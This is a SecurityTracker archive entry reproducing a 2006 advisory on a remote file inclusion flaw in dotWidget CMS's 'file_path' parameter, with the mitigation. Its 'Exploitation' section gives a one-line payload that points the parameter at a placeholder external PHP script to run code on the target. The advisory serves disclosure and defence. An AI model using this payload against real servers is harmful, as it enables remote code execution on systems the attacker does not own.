SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   dotWidget CMS Vendors:   dotwidget.com
dotWidget CMS Include File Flaw in 'file_path' Parameter Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016220
SecurityTracker URL:  http://securitytracker.com/id/1016220
CVE Reference:   CVE-2006-2852   (Links to External Site)
Updated:  May 22 2009
Original Entry Date:  Jun 5 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.0.6 and prior versions
Description:   David 'Aesthetico' Vieira-Kurz of MajorSecurity reported a vulnerability in dotWidget CMS. A remote user can include and execute arbitrary code on the target system.

The software does not properly validate user-supplied input. If register_globals is enabled, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

The 'file_path' parameter in the 'index.php', 'feedback.php', and 'printfriendly.php' scripts are affected.

The original advisory is available at:

http://www.majorsecurity.de/advisory/major_rls7.txt

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.dotwidget.com/index.php/125 (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [MajorSecurity #7]dotWidget CMS <= 1.0.6 - Remote File Include

[MajorSecurity #7]dotWidget CMS <= 1.0.6 - Remote File Include Vulnerability

-------------------------------------------------------------------------------------


Software: dotWidget CMS


Version: <=1.0.6


Type: Remote File Include Vulnerability


Date: June, 2nd 2006


Vendor: dotWidget  


Page: http://dotwigdet.com


Risc: High



Credits:

----------------------------


Discovered by: David 'Aesthetico' Vieira-Kurz

http://www.majorsecurity.de


Original Advisory:

----------------------------

http://www.majorsecurity.de/advisory/major_rls7.txt


Affected Products:

----------------------------


dotWidget CMS 1.0.6 and prior


Description:

----------------------------


dotWidget CMS is content management at its easiest. Update your site's content in real-time.

Features include a built-in WYSIWYG text editor, multiple users and access levels, 

customizable templates and more.


Requirements:

----------------------------


register_globals = On



Vulnerability:

----------------------------


Input passed to the "file_path" parameter in "index.php" "feedback.php" and "printfriendly.php" 

is not properly verified, before it is used to include files.

This can be exploited to execute arbitrary code by including files from external resources.


Solution:

----------------------------


Edit the source code to ensure that input is properly sanitised.

Set "register_globals" to "Off".


Exploitation:

----------------------------


Post data:


file_path=http://www.yourspace.com/yourscript.php?

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC